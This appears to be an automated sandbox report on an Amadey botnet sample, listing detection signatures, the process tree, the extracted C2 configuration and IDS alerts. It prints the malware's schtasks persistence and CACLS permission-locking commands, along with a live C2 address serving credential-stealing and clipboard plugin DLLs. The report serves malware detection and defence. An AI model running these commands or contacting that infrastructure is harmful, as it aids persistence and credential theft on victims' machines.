Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Week13.exe

Overview

General Information

Sample name:Week13.exe
Analysis ID:1561232
MD5:a1b8fa53a47b1991ee76a46ee8685b7d
SHA1:4002a9cffcde9f7f44633457457792564a63bf5d
SHA256:e472fd69b5a891059f44206124baf829cb7583890e2c8e288e311359a2249871
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses cacls to modify the permissions of files

Classification

  • System is w10x64
  • Week13.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\Week13.exe" MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
    • oneetx.exe (PID: 6384 cmdline: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
      • schtasks.exe (PID: 5004 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2500 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6196 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cacls.exe (PID: 5928 cmdline: CACLS "oneetx.exe" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cacls.exe (PID: 1016 cmdline: CACLS "oneetx.exe" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cmd.exe (PID: 6892 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cacls.exe (PID: 4456 cmdline: CACLS "..\cb7ae701b3" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cacls.exe (PID: 3260 cmdline: CACLS "..\cb7ae701b3" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
  • oneetx.exe (PID: 5664 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 1544 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 5548 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 5052 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 3300 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "193.3.19.154/store/games/index.php", "Version": "3.80", "Install Folder": "cb7ae701b3", "Install File": "oneetx.exe"}
SourceRuleDescriptionAuthorStrings
Week13.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        SourceRuleDescriptionAuthorStrings
        00000014.00000000.3695875286.0000000000441000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000009.00000002.1758679775.0000000000441000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000000.00000000.1746271067.0000000000FB1000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000013.00000002.3096531866.0000000000441000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000001.00000000.1751724718.0000000000441000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Click to see the 11 entries
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, ParentProcessId: 6384, ParentProcessName: oneetx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, ProcessId: 5004, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, ParentProcessId: 6384, ParentProcessName: oneetx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, ProcessId: 5004, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-22T23:01:49.628585+010020277001Malware Command and Control Activity Detected192.168.2.450063193.3.19.15480TCP
                  2024-11-22T23:01:53.631928+010020277001Malware Command and Control Activity Detected192.168.2.449731193.3.19.15480TCP
                  2024-11-22T23:01:57.875819+010020277001Malware Command and Control Activity Detected192.168.2.449732193.3.19.15480TCP
                  2024-11-22T23:02:02.094612+010020277001Malware Command and Control Activity Detected192.168.2.449733193.3.19.15480TCP
                  2024-11-22T23:02:06.329029+010020277001Malware Command and Control Activity Detected192.168.2.449735193.3.19.15480TCP
                  2024-11-22T23:02:10.547760+010020277001Malware Command and Control Activity Detected192.168.2.449737193.3.19.15480TCP
                  2024-11-22T23:02:14.766326+010020277001Malware Command and Control Activity Detected192.168.2.449742193.3.19.15480TCP
                  2024-11-22T23:02:19.003986+010020277001Malware Command and Control Activity Detected192.168.2.449745193.3.19.15480TCP
                  2024-11-22T23:02:23.236152+010020277001Malware Command and Control Activity Detected192.168.2.449747193.3.19.15480TCP
                  2024-11-22T23:02:27.476830+010020277001Malware Command and Control Activity Detected192.168.2.449748193.3.19.15480TCP
                  2024-11-22T23:02:31.704018+010020277001Malware Command and Control Activity Detected192.168.2.449750193.3.19.15480TCP
                  2024-11-22T23:02:35.938261+010020277001Malware Command and Control Activity Detected192.168.2.449751193.3.19.15480TCP
                  2024-11-22T23:02:40.172631+010020277001Malware Command and Control Activity Detected192.168.2.449753193.3.19.15480TCP
                  2024-11-22T23:02:44.428618+010020277001Malware Command and Control Activity Detected192.168.2.449755193.3.19.15480TCP
                  2024-11-22T23:02:48.657050+010020277001Malware Command and Control Activity Detected192.168.2.449766193.3.19.15480TCP
                  2024-11-22T23:02:52.891608+010020277001Malware Command and Control Activity Detected192.168.2.449775193.3.19.15480TCP
                  2024-11-22T23:02:57.141702+010020277001Malware Command and Control Activity Detected192.168.2.449784193.3.19.15480TCP
                  2024-11-22T23:03:01.360558+010020277001Malware Command and Control Activity Detected192.168.2.449795193.3.19.15480TCP
                  2024-11-22T23:03:05.657214+010020277001Malware Command and Control Activity Detected192.168.2.449806193.3.19.15480TCP
                  2024-11-22T23:03:09.891778+010020277001Malware Command and Control Activity Detected192.168.2.449817193.3.19.15480TCP
                  2024-11-22T23:03:14.113332+010020277001Malware Command and Control Activity Detected192.168.2.449828193.3.19.15480TCP
                  2024-11-22T23:03:18.344757+010020277001Malware Command and Control Activity Detected192.168.2.449839193.3.19.15480TCP
                  2024-11-22T23:03:22.579523+010020277001Malware Command and Control Activity Detected192.168.2.449848193.3.19.15480TCP
                  2024-11-22T23:03:26.813624+010020277001Malware Command and Control Activity Detected192.168.2.449858193.3.19.15480TCP
                  2024-11-22T23:03:31.047873+010020277001Malware Command and Control Activity Detected192.168.2.449867193.3.19.15480TCP
                  2024-11-22T23:03:44.704283+010020277001Malware Command and Control Activity Detected192.168.2.449878193.3.19.15480TCP
                  2024-11-22T23:03:48.941303+010020277001Malware Command and Control Activity Detected192.168.2.449909193.3.19.15480TCP
                  2024-11-22T23:03:53.173110+010020277001Malware Command and Control Activity Detected192.168.2.449920193.3.19.15480TCP
                  2024-11-22T23:03:57.545622+010020277001Malware Command and Control Activity Detected192.168.2.449931193.3.19.15480TCP
                  2024-11-22T23:04:01.829258+010020277001Malware Command and Control Activity Detected192.168.2.449942193.3.19.15480TCP
                  2024-11-22T23:04:06.063658+010020277001Malware Command and Control Activity Detected192.168.2.449953193.3.19.15480TCP
                  2024-11-22T23:04:10.282475+010020277001Malware Command and Control Activity Detected192.168.2.449964193.3.19.15480TCP
                  2024-11-22T23:04:14.517079+010020277001Malware Command and Control Activity Detected192.168.2.449973193.3.19.15480TCP
                  2024-11-22T23:04:18.751433+010020277001Malware Command and Control Activity Detected192.168.2.449981193.3.19.15480TCP
                  2024-11-22T23:04:23.016897+010020277001Malware Command and Control Activity Detected192.168.2.449992193.3.19.15480TCP
                  2024-11-22T23:04:27.251214+010020277001Malware Command and Control Activity Detected192.168.2.450003193.3.19.15480TCP
                  2024-11-22T23:04:31.485699+010020277001Malware Command and Control Activity Detected192.168.2.450013193.3.19.15480TCP
                  2024-11-22T23:04:35.704474+010020277001Malware Command and Control Activity Detected192.168.2.450024193.3.19.15480TCP
                  2024-11-22T23:04:39.954324+010020277001Malware Command and Control Activity Detected192.168.2.450035193.3.19.15480TCP
                  2024-11-22T23:04:44.188956+010020277001Malware Command and Control Activity Detected192.168.2.450044193.3.19.15480TCP
                  2024-11-22T23:04:48.439563+010020277001Malware Command and Control Activity Detected192.168.2.450047193.3.19.15480TCP
                  2024-11-22T23:04:52.673519+010020277001Malware Command and Control Activity Detected192.168.2.450048193.3.19.15480TCP
                  2024-11-22T23:04:56.908147+010020277001Malware Command and Control Activity Detected192.168.2.450049193.3.19.15480TCP
                  2024-11-22T23:05:01.157745+010020277001Malware Command and Control Activity Detected192.168.2.450050193.3.19.15480TCP
                  2024-11-22T23:05:05.392163+010020277001Malware Command and Control Activity Detected192.168.2.450051193.3.19.15480TCP
                  2024-11-22T23:05:09.626401+010020277001Malware Command and Control Activity Detected192.168.2.450052193.3.19.15480TCP
                  2024-11-22T23:05:13.861186+010020277001Malware Command and Control Activity Detected192.168.2.450053193.3.19.15480TCP
                  2024-11-22T23:05:18.095204+010020277001Malware Command and Control Activity Detected192.168.2.450054193.3.19.15480TCP
                  2024-11-22T23:05:22.350850+010020277001Malware Command and Control Activity Detected192.168.2.450055193.3.19.15480TCP
                  2024-11-22T23:05:26.610715+010020277001Malware Command and Control Activity Detected192.168.2.450056193.3.19.15480TCP
                  2024-11-22T23:05:30.845218+010020277001Malware Command and Control Activity Detected192.168.2.450057193.3.19.15480TCP
                  2024-11-22T23:05:35.097657+010020277001Malware Command and Control Activity Detected192.168.2.450058193.3.19.15480TCP
                  2024-11-22T23:05:39.317669+010020277001Malware Command and Control Activity Detected192.168.2.450059193.3.19.15480TCP
                  2024-11-22T23:05:43.548366+010020277001Malware Command and Control Activity Detected192.168.2.450060193.3.19.15480TCP
                  2024-11-22T23:05:47.767633+010020277001Malware Command and Control Activity Detected192.168.2.450061193.3.19.15480TCP
                  2024-11-22T23:05:52.004667+010020277001Malware Command and Control Activity Detected192.168.2.450062193.3.19.15480TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-22T23:01:49.628585+010020457511A Network Trojan was detected192.168.2.450063193.3.19.15480TCP
                  2024-11-22T23:01:53.631928+010020457511A Network Trojan was detected192.168.2.449731193.3.19.15480TCP
                  2024-11-22T23:01:57.875819+010020457511A Network Trojan was detected192.168.2.449732193.3.19.15480TCP
                  2024-11-22T23:02:02.094612+010020457511A Network Trojan was detected192.168.2.449733193.3.19.15480TCP
                  2024-11-22T23:02:06.329029+010020457511A Network Trojan was detected192.168.2.449735193.3.19.15480TCP
                  2024-11-22T23:02:10.547760+010020457511A Network Trojan was detected192.168.2.449737193.3.19.15480TCP
                  2024-11-22T23:02:14.766326+010020457511A Network Trojan was detected192.168.2.449742193.3.19.15480TCP
                  2024-11-22T23:02:19.003986+010020457511A Network Trojan was detected192.168.2.449745193.3.19.15480TCP
                  2024-11-22T23:02:23.236152+010020457511A Network Trojan was detected192.168.2.449747193.3.19.15480TCP
                  2024-11-22T23:02:27.476830+010020457511A Network Trojan was detected192.168.2.449748193.3.19.15480TCP
                  2024-11-22T23:02:31.704018+010020457511A Network Trojan was detected192.168.2.449750193.3.19.15480TCP
                  2024-11-22T23:02:35.938261+010020457511A Network Trojan was detected192.168.2.449751193.3.19.15480TCP
                  2024-11-22T23:02:40.172631+010020457511A Network Trojan was detected192.168.2.449753193.3.19.15480TCP
                  2024-11-22T23:02:44.428618+010020457511A Network Trojan was detected192.168.2.449755193.3.19.15480TCP
                  2024-11-22T23:02:48.657050+010020457511A Network Trojan was detected192.168.2.449766193.3.19.15480TCP
                  2024-11-22T23:02:52.891608+010020457511A Network Trojan was detected192.168.2.449775193.3.19.15480TCP
                  2024-11-22T23:02:57.141702+010020457511A Network Trojan was detected192.168.2.449784193.3.19.15480TCP
                  2024-11-22T23:03:01.360558+010020457511A Network Trojan was detected192.168.2.449795193.3.19.15480TCP
                  2024-11-22T23:03:05.657214+010020457511A Network Trojan was detected192.168.2.449806193.3.19.15480TCP
                  2024-11-22T23:03:09.891778+010020457511A Network Trojan was detected192.168.2.449817193.3.19.15480TCP
                  2024-11-22T23:03:14.113332+010020457511A Network Trojan was detected192.168.2.449828193.3.19.15480TCP
                  2024-11-22T23:03:18.344757+010020457511A Network Trojan was detected192.168.2.449839193.3.19.15480TCP
                  2024-11-22T23:03:22.579523+010020457511A Network Trojan was detected192.168.2.449848193.3.19.15480TCP
                  2024-11-22T23:03:26.813624+010020457511A Network Trojan was detected192.168.2.449858193.3.19.15480TCP
                  2024-11-22T23:03:31.047873+010020457511A Network Trojan was detected192.168.2.449867193.3.19.15480TCP
                  2024-11-22T23:03:44.704283+010020457511A Network Trojan was detected192.168.2.449878193.3.19.15480TCP
                  2024-11-22T23:03:48.941303+010020457511A Network Trojan was detected192.168.2.449909193.3.19.15480TCP
                  2024-11-22T23:03:53.173110+010020457511A Network Trojan was detected192.168.2.449920193.3.19.15480TCP
                  2024-11-22T23:03:57.545622+010020457511A Network Trojan was detected192.168.2.449931193.3.19.15480TCP
                  2024-11-22T23:04:01.829258+010020457511A Network Trojan was detected192.168.2.449942193.3.19.15480TCP
                  2024-11-22T23:04:06.063658+010020457511A Network Trojan was detected192.168.2.449953193.3.19.15480TCP
                  2024-11-22T23:04:10.282475+010020457511A Network Trojan was detected192.168.2.449964193.3.19.15480TCP
                  2024-11-22T23:04:14.517079+010020457511A Network Trojan was detected192.168.2.449973193.3.19.15480TCP
                  2024-11-22T23:04:18.751433+010020457511A Network Trojan was detected192.168.2.449981193.3.19.15480TCP
                  2024-11-22T23:04:23.016897+010020457511A Network Trojan was detected192.168.2.449992193.3.19.15480TCP
                  2024-11-22T23:04:27.251214+010020457511A Network Trojan was detected192.168.2.450003193.3.19.15480TCP
                  2024-11-22T23:04:31.485699+010020457511A Network Trojan was detected192.168.2.450013193.3.19.15480TCP
                  2024-11-22T23:04:35.704474+010020457511A Network Trojan was detected192.168.2.450024193.3.19.15480TCP
                  2024-11-22T23:04:39.954324+010020457511A Network Trojan was detected192.168.2.450035193.3.19.15480TCP
                  2024-11-22T23:04:44.188956+010020457511A Network Trojan was detected192.168.2.450044193.3.19.15480TCP
                  2024-11-22T23:04:48.439563+010020457511A Network Trojan was detected192.168.2.450047193.3.19.15480TCP
                  2024-11-22T23:04:52.673519+010020457511A Network Trojan was detected192.168.2.450048193.3.19.15480TCP
                  2024-11-22T23:04:56.908147+010020457511A Network Trojan was detected192.168.2.450049193.3.19.15480TCP
                  2024-11-22T23:05:01.157745+010020457511A Network Trojan was detected192.168.2.450050193.3.19.15480TCP
                  2024-11-22T23:05:05.392163+010020457511A Network Trojan was detected192.168.2.450051193.3.19.15480TCP
                  2024-11-22T23:05:09.626401+010020457511A Network Trojan was detected192.168.2.450052193.3.19.15480TCP
                  2024-11-22T23:05:13.861186+010020457511A Network Trojan was detected192.168.2.450053193.3.19.15480TCP
                  2024-11-22T23:05:18.095204+010020457511A Network Trojan was detected192.168.2.450054193.3.19.15480TCP
                  2024-11-22T23:05:22.350850+010020457511A Network Trojan was detected192.168.2.450055193.3.19.15480TCP
                  2024-11-22T23:05:26.610715+010020457511A Network Trojan was detected192.168.2.450056193.3.19.15480TCP
                  2024-11-22T23:05:30.845218+010020457511A Network Trojan was detected192.168.2.450057193.3.19.15480TCP
                  2024-11-22T23:05:35.097657+010020457511A Network Trojan was detected192.168.2.450058193.3.19.15480TCP
                  2024-11-22T23:05:39.317669+010020457511A Network Trojan was detected192.168.2.450059193.3.19.15480TCP
                  2024-11-22T23:05:43.548366+010020457511A Network Trojan was detected192.168.2.450060193.3.19.15480TCP
                  2024-11-22T23:05:47.767633+010020457511A Network Trojan was detected192.168.2.450061193.3.19.15480TCP
                  2024-11-22T23:05:52.004667+010020457511A Network Trojan was detected192.168.2.450062193.3.19.15480TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-22T23:01:53.630805+010028033053Unknown Traffic192.168.2.449730193.3.19.15480TCP
                  2024-11-22T23:02:02.094616+010028033053Unknown Traffic192.168.2.449734193.3.19.15480TCP
                  2024-11-22T23:02:10.547661+010028033053Unknown Traffic192.168.2.449739193.3.19.15480TCP
                  2024-11-22T23:02:19.004101+010028033053Unknown Traffic192.168.2.449746193.3.19.15480TCP
                  2024-11-22T23:02:27.476781+010028033053Unknown Traffic192.168.2.449749193.3.19.15480TCP
                  2024-11-22T23:02:35.938386+010028033053Unknown Traffic192.168.2.449752193.3.19.15480TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Week13.exeAvira: detected
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dll?Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.php4~Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dllAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.php5a2ab05Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpbAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dll;Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phphAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dllmingMAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpp#Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpSf7XJqPNYA2AOsO34i0TH=Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.php9Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phppAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dllalAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dll1Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpcodedAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.phpXAvira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/cred64.dll-Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/index.php2465a8e1dc15491b69b82f20Avira URL Cloud: Label: malware
                  Source: http://193.3.19.154/store/games/Plugins/clip64.dllAvira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeAvira: detection malicious, Label: HEUR/AGEN.1317762
                  Source: Week13.exeMalware Configuration Extractor: Amadey {"C2 url": "193.3.19.154/store/games/index.php", "Version": "3.80", "Install Folder": "cb7ae701b3", "Install File": "oneetx.exe"}
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeReversingLabs: Detection: 91%
                  Source: Week13.exeReversingLabs: Detection: 91%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeJoe Sandbox ML: detected
                  Source: Week13.exeJoe Sandbox ML: detected
                  Source: Week13.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Week13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: Week13.exe, oneetx.exe.0.dr
                  Source: Binary string: dey\Release\Amadey.pdb source: Week13.exe, 00000000.00000002.1756030969.0000000006740000.00000004.00000020.00020000.00000000.sdmp

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49745 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49745 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49737 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49748 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49748 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49742 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49733 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49742 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49750 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49750 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49733 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49731 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49747 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49753 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49731 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49753 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49751 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49784 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49784 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49775 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49775 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49755 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49755 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49747 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49732 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49732 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49795 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49737 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49828 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49828 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49817 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.4:49806 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.4:49795 -> 193.3.19.154:80
